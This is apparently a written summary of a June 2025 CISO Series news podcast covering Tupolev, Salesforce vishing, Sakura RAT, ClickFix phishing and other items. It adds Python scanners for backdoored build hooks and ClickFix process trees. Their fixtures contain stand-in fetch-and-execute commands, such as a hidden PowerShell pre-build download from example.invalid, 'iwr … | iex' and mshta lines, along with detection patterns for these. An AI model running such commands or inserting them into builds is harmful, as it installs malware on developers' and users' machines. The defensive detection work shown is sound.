Cyber Security Headlines: Russian Bomber Maker Popped, Vishing Targets Salesforce, MS Helps Out Governments Hosted by CISO Series | Released on June 5, 2025
In this episode of "Cybersecurity Headlines," Rich Stroffelino delves into the latest developments in the information security landscape. From state-sponsored cyberattacks to evolving phishing techniques and corporate defenses, this episode provides a comprehensive overview of critical events shaping cybersecurity today.
1. Ukraine Claims Cyberattack on Russian Bomber Maker
Timestamp: [00:06]
Ukraine's military intelligence agency (HUR) says it breached Tupolev, the Russian state-owned maker of strategic bombers, and accessed more than 4 GB of data, including internal communications, meeting notes and servicing records for the bombers. The agency also says it defaced Tupolev's website, which remained offline at the time of recording.
Rich Stroffelino highlights the timing of this cyber offensive, noting, “This comes days after Ukraine launched a drone offensive against Russian air bases, damaging over 40 long-range bombers” (00:12). This series of attacks underscores the escalating cyber dimensions of geopolitical conflicts.
Key Points:
- Data Accessed: Internal communications, meeting notes, servicing records.
- Website Vandalism: Tupolev's site remains down.
- Context: Follows Ukraine's drone attacks on Russian air bases.
2. Vishing Campaign Targets Salesforce
Timestamp: [00:25]
Researchers from Google's Threat Intelligence Group have identified a vishing (voice phishing) campaign run by the threat group UNC6040. The group has repeatedly breached corporate environments by phoning employees while posing as IT support and talking them through installing a modified version of a legitimate tool.
Rich explains, “These vishing attacks attempt to get staff to load a modified version of Salesforce's Data Loader, usually used for bulk data access on the platform” (00:30). Data Loader is a legitimate client for bulk import and export of Salesforce records; once the victim approves the attackers' modified copy against the organization's Salesforce instance, the attackers can query and export data at scale and pivot to other cloud services reachable with the victim's access. In some cases, organizations received extortion demands months after the initial breach, suggesting the stolen data was handed to, or sold to, other criminal actors.
Key Points:
- Threat Group: UNC6040.
- Tactics: Phone calls impersonating IT support; the victim is walked through installing the attackers' tool.
- Tool Used: A modified version of Salesforce's Data Loader, approved by the victim against their own Salesforce instance.
- Consequences: Data exfiltration, network pivoting, extortion attempts.
3. Microsoft Lends a Hand to European Governments
Timestamp: [01:15]
In response to the increasing cyber threats in Europe, Microsoft has launched a new program aimed at fortifying the cybersecurity defenses of European governments. The initiative focuses on three primary areas:
- AI-Based Threat Intelligence Sharing: Enhancing the dissemination of threat intelligence using advanced AI to identify and respond to emerging threats swiftly.
- Investment in Resilience: Allocating resources to bolster the resilience of governmental infrastructures against cyberattacks.
- Expanding Partnerships: Collaborating more closely with European governments to detect and dismantle threat networks effectively.
Rich comments, “This program will include intelligence sharing on emerging threats and help with disrupting attacks already underway” (01:20). By leveraging Microsoft's extensive resources and expertise, European governments are better equipped to handle the dynamic nature of cyber threats.
Key Points:
- Program Focus: AI-based threat intelligence, resilience investment, partnership expansion.
- Objective: Strengthen defenses, disrupt ongoing attacks, enhance detection capabilities.
4. Lee Enterprises Data Breach Impacts Over 39,000 Individuals
Timestamp: [02:00]
Lee Enterprises, a large US newspaper group, suffered a cyberattack in February that caused outages across its network. In a breach notification filed with Maine's Attorney General, the company disclosed that personally identifiable information (PII) belonging to 39,779 individuals was compromised. The filing does not say which data elements were exposed, and Lee itself has never attributed the attack to a threat group; the Qilin ransomware group, however, claimed responsibility on its leak site, saying it had stolen over 350 GB of data.
Rich notes, “Although it was light on what this actually included, Lee never attributed the attack to a threat group. But the Qilin Ransomware Group took credit...” (02:05). The incident is another example of ransomware groups targeting media organizations.
Key Points:
- Affected Individuals: 39,779.
- Data Compromised: PII (details unspecified).
- Attribution: Lee made no attribution; the Qilin ransomware group claimed responsibility.
5. Replay Attacks Bypass Deepfake Detection
Timestamp: [03:00]
A study by Resemble AI and European academic researchers describes a way to evade existing audio deepfake detectors that the authors term a "replay attack." The technique is simple: generate synthetic speech, play it aloud through a speaker, and re-record it with a microphone in a room with real background noise.
Rich explains, “This approach increased error rates from 4.7% to 18.2%” (03:05). Passing the audio through a speaker, a room and a microphone adds genuine acoustic characteristics and smears the spectral artifacts that detectors rely on, so the replayed clip looks more like a real recording than like synthesized audio. Retraining the detectors on specific room tones improved results only marginally, which the authors read as a sign that current detection approaches need to be made robust against this class of evasion.
Key Points:
- Method: Synthetic speech played through a speaker and re-recorded with real background noise.
- Impact: Detection error rates rose from 4.7% to 18.2% in the study.
- Implications: Detectors need to be trained and evaluated against replayed audio, not just direct synthetic output.
6. Sakura RAT Malware Unveiled
Timestamp: [04:00]
Sophos researchers examined a piece of malware called Sakura RAT that at first looked non-functional. On closer inspection, its Visual Studio project contains a pre-build event that downloads an additional backdoor when the code is compiled, so the person building the "tool" is the one who gets infected. Pivoting on an email address embedded in the code led the researchers to 133 GitHub repositories hosting similarly backdoored software.
Rich details, “The threat actors auto-generated commits with GitHub Actions, following a strict pattern across projects that shows significant coordination” (04:05). The payloads delivered through these repositories vary, ranging from custom backdoors to commodity malware such as AsyncRAT and Lumma Stealer, and the repositories pose as everything from game cheats to hacking utilities. The steady stream of auto-generated commits is meant to make the projects look actively maintained and therefore trustworthy to the people who download and build them.
Key Points:
- Malware Name: Sakura RAT.
- Distribution Method: 133 GitHub repositories with a pre-build event in the project file that fetches a second-stage payload at compile time.
- Payloads: Diverse, including custom backdoors, AsyncRAT and Lumma Stealer.
- Threat Actor Tactics: Auto-generated commits via GitHub Actions to simulate active maintenance; repositories posing as game cheats and hacking tools.
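The pattern Sophos describes, a build-time hook in the project file that fetches a payload when the victim compiles the code, is one a practitioner can check for before building anything cloned from an untrusted repository. The following Python script is an added example and is not code from the podcast, from Sophos, or from the repositories described. It parses MSBuild project files (`.csproj`, `.vbproj`, `.targets`, `.props`), pulls out every `PreBuildEvent`, `PostBuildEvent` and `Exec` task, and flags those containing download or execution indicators. The two embedded project files are constructed samples; the host `example.invalid` and file names are placeholders.

```python
import pathlib
import re
import xml.etree.ElementTree as ET

# Constructed project files (not the Sophos samples). The backdoored one mirrors the pattern the
# episode describes: a build-time hook that fetches a second-stage payload when the victim compiles.
# Hostnames and file names are placeholders.
BACKDOORED_CSPROJ = """<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <PropertyGroup>
    <OutputType>WinExe</OutputType>
    <AssemblyName>SakuraClient</AssemblyName>
    <PreBuildEvent>powershell -w hidden -c "iwr http://example.invalid/stage2.exe -OutFile $(TEMP)\\s.exe; Start-Process $(TEMP)\\s.exe"</PreBuildEvent>
  </PropertyGroup>
  <Target Name="Fetch" BeforeTargets="Build">
    <Exec Command="curl -s http://example.invalid/x.bin -o x.bin" />
  </Target>
</Project>"""

CLEAN_CSPROJ = """<Project Sdk="Microsoft.NET.Sdk">
  <PropertyGroup>
    <PreBuildEvent>echo Building $(ProjectName)</PreBuildEvent>
  </PropertyGroup>
</Project>"""

# Things a build step of a hobby project rarely needs but a dropper almost always does.
SUSPICIOUS = re.compile(
    r"(https?://|iwr\b|irm\b|invoke-webrequest|downloadstring|downloadfile|curl\b|wget\b|"
    r"certutil|bitsadmin|mshta|frombase64string|-enc\b|-w hidden|start-process)", re.I)

PROJECT_SUFFIXES = (".csproj", ".vbproj", ".targets", ".props")


def find_build_hooks(xml_text):
    """Return [(tag, command)] for every pre/post-build event and Exec task, ignoring the MSBuild namespace."""
    root = ET.fromstring(xml_text)
    hooks = []
    for el in root.iter():
        tag = el.tag.rsplit("}", 1)[-1]  # strip a leading "{namespace}" if present
        if tag in ("PreBuildEvent", "PostBuildEvent"):
            hooks.append((tag, (el.text or "").strip()))
        elif tag == "Exec":
            hooks.append((tag, (el.get("Command") or "").strip()))
    return hooks


def flag_suspicious(xml_text):
    """Return [(tag, command, [indicators])] for build hooks that look like droppers."""
    findings = []
    for tag, cmd in find_build_hooks(xml_text):
        indicators = sorted({m.lower() for m in SUSPICIOUS.findall(cmd)})
        if indicators:
            findings.append((tag, cmd, indicators))
    return findings


def scan_tree(root_dir):
    """Scan every project file under root_dir (e.g. a freshly cloned repo) and map path -> findings."""
    results = {}
    for path in pathlib.Path(root_dir).rglob("*"):
        if path.suffix.lower() not in PROJECT_SUFFIXES:
            continue
        try:
            findings = flag_suspicious(path.read_text(encoding="utf-8", errors="replace"))
        except ET.ParseError:
            continue  # not well-formed XML; worth a manual look but not a finding by itself
        if findings:
            results[str(path)] = findings
    return results


if __name__ == "__main__":
    for tag, cmd, indicators in flag_suspicious(BACKDOORED_CSPROJ):
        print(f"{tag}: {indicators}\n    {cmd}")
    print("clean project findings:", flag_suspicious(CLEAN_CSPROJ))
```

Run `scan_tree(".")` in the root of a cloned repository before opening the solution in Visual Studio; a `PreBuildEvent` that reaches out to the network is worth treating as hostile until proven otherwise, since it executes with the developer's privileges the moment the project builds.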
7. Booking.com Spoofed Phishing Campaign
Timestamp: [05:00]
Cofense Intelligence has identified an ongoing phishing campaign spoofing Booking.com that has been active since at least November 2024. The campaign targets hotel staff with emails posing as guest-related queries that demand a quick response. The links lead to a ClickFix lure: a fake CAPTCHA or verification page that instructs the recipient to paste a pre-loaded command into the Windows Run dialog, and that command fetches and runs the malware.
Rich states, “These messages use ClickFix to pose as a captcha, ultimately being used to start a malware download and install a RAT or infostealer” (05:05). The campaign also dresses the same trick up as cookie-consent banners and Cloudflare-style interstitial pages, so the step that delivers the payload looks like the ordinary friction of browsing the web.
Key Points:
- Target: Hotel staff.
- Tactics: Impersonation of guest queries, time-sensitive lures, ClickFix fake CAPTCHA pages.
- Payloads: Remote Access Trojans (RATs) and infostealers.
- Additional Techniques: Cookie-consent banners and Cloudflare-style interstitial pages used as the payload-delivery step.
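Because ClickFix relies on the victim pasting a command into the Run dialog, the resulting process tree is distinctive: `explorer.exe` (or a browser) spawning `powershell.exe` or `mshta.exe` with a command line that downloads and executes something. The following Python script is an added example, not code from the podcast or from Cofense; it runs that heuristic over a handful of constructed process-creation events in a trimmed Sysmon Event ID 1 shape, decoding a PowerShell `-EncodedCommand` argument along the way so the indicators inside it are not missed. The events, the host `example.invalid` and the file names are constructed, and the parent and interpreter lists are the author's assumptions about what a typical campaign uses.

```python
import base64
import re

# Constructed process-creation events in a trimmed Sysmon Event ID 1 shape.
# None of this is real telemetry; hosts and URLs are placeholders.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
PAYLOAD = "iwr http://example.invalid/p.ps1 | iex"  # the shape of a typical ClickFix clipboard command
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16le")).decode()  # -EncodedCommand is base64 of UTF-16LE

EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": 'powershell -w hidden -c "irm http://example.invalid/c -UseBasicParsing | iex"'},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta http://example.invalid/verify.hta"},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": "powershell -nop -w hidden -EncodedCommand " + ENCODED},
    {"ParentImage": r"C:\Program Files\Microsoft VS Code\Code.exe", "Image": PS,
     "CommandLine": 'powershell -NoProfile -Command "irm http://example.invalid/c"'},  # not a ClickFix parent
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": 'powershell -NoProfile -Command "Get-Date"'},  # interactive use, nothing fetched
]

# Interpreters ClickFix lures tell the victim to invoke (assumed list), and the parents they get
# when the victim pastes into the Win+R Run dialog (explorer.exe) or a browser-launched handler.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "curl.exe", "certutil.exe", "bitsadmin.exe"}
CLICKFIX_PARENTS = {"explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe", "brave.exe"}
FETCH_OR_EXEC = re.compile(
    r"(irm\b|iwr\b|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile|"
    r"\biex\b|invoke-expression|mshta\b|curl\b|certutil\b|bitsadmin\b)", re.I)
ENC_ARG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
HIDDEN = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)


def decode_encoded_command(cmdline):
    """Return (decoded_text, cmdline_without_blob); decoded_text is None when no encoded argument is present."""
    m = ENC_ARG.search(cmdline)
    if not m:
        return None, cmdline
    try:
        decoded = base64.b64decode(m.group(1)).decode("utf-16le", errors="replace")
    except ValueError:  # binascii.Error is a ValueError: not valid base64 after all
        return None, cmdline
    return decoded, cmdline[:m.start(1)] + cmdline[m.end(1):]


def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def analyze(event):
    """Return the reasons an event looks like ClickFix execution, or None if it does not."""
    parent, image = _basename(event["ParentImage"]), _basename(event["Image"])
    if image not in INTERPRETERS or parent not in CLICKFIX_PARENTS:
        return None
    decoded, visible = decode_encoded_command(event["CommandLine"])
    text = visible + (" " + decoded if decoded else "")
    reasons = sorted({m.lower() for m in FETCH_OR_EXEC.findall(text)})
    if not reasons:
        return None  # a shell opened from the Run dialog is not enough on its own
    if HIDDEN.search(visible):
        reasons.append("hidden window")
    if decoded:
        reasons.append("encoded command: " + decoded)
    return reasons


def scan(events):
    """Return [(index, reasons)] for every event that trips the heuristic."""
    hits = []
    for i, event in enumerate(events):
        reasons = analyze(event)
        if reasons:
            hits.append((i, reasons))
    return hits


if __name__ == "__main__":
    for i, reasons in scan(EVENTS):
        print(i, reasons)
```

The parent-process condition is what keeps this from firing on every scripted PowerShell run in the environment; the same fetch-and-execute strings launched by a deployment agent are routine, while `explorer.exe` launching a hidden-window download is almost always a person who was told to paste something.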
8. FBI Warns About NFT Airdrop Phishing Scheme
Timestamp: [06:00]
The FBI has issued a warning about a phishing scheme that uses non-fungible tokens (NFTs) on the Hedera Hashgraph network as the lure. Threat actors airdrop unsolicited NFTs into victims' wallets with a memo urging them to visit a URL to claim a reward. The link leads to a phishing page built to harvest wallet seed phrases and passwords, which give the attackers full control of the wallet.
Rich elaborates, “This campaign also uses standard phishing emails, social media ads, and fake sites to draw in victims” (06:05). The FBI advises verifying any NFT drop through official channels rather than acting on the memo attached to an unsolicited token. Hedera Hashgraph, introduced in 2018, is a distributed ledger that markets itself on throughput and efficiency relative to conventional blockchains.
Key Points:
- Scheme: Unsolicited NFT airdrops with malicious URLs.
- Targets: Cryptocurrency wallet holders.
- Techniques: Phishing emails, social media ads, fake websites.
- Prevention: Verify NFT drops through official sources, and never enter a seed phrase on a page reached from an unsolicited link or memo.
Conclusion
Rich Stroffelino wraps up the episode by emphasizing the role of threat intelligence in moving organizations toward a proactive security posture. He states, “We're increasingly using threat intelligence to move our organizations to a more proactive security posture, making them more resilient against cyber attacks” (06:30). The point is that threat intelligence only pays off when it is integrated into the Security Operations Center (SOC) in a form analysts can act on, rather than consumed as a feed.
Key Takeaways:
- Proactive Security: Leveraging threat intelligence for anticipation and mitigation of cyber threats.
- Collaboration: Importance of partnerships between governments and private entities.
- Continuous Improvement: Adapting detection and defense mechanisms to counter sophisticated attack methods.
For more in-depth analysis and daily cybersecurity stories, listeners are encouraged to visit CISOseries.com.
Reporting from the CISO Series, Rich Stroffelino encourages listeners to engage and share their thoughts by reaching out via feedback@cisoseries.com.
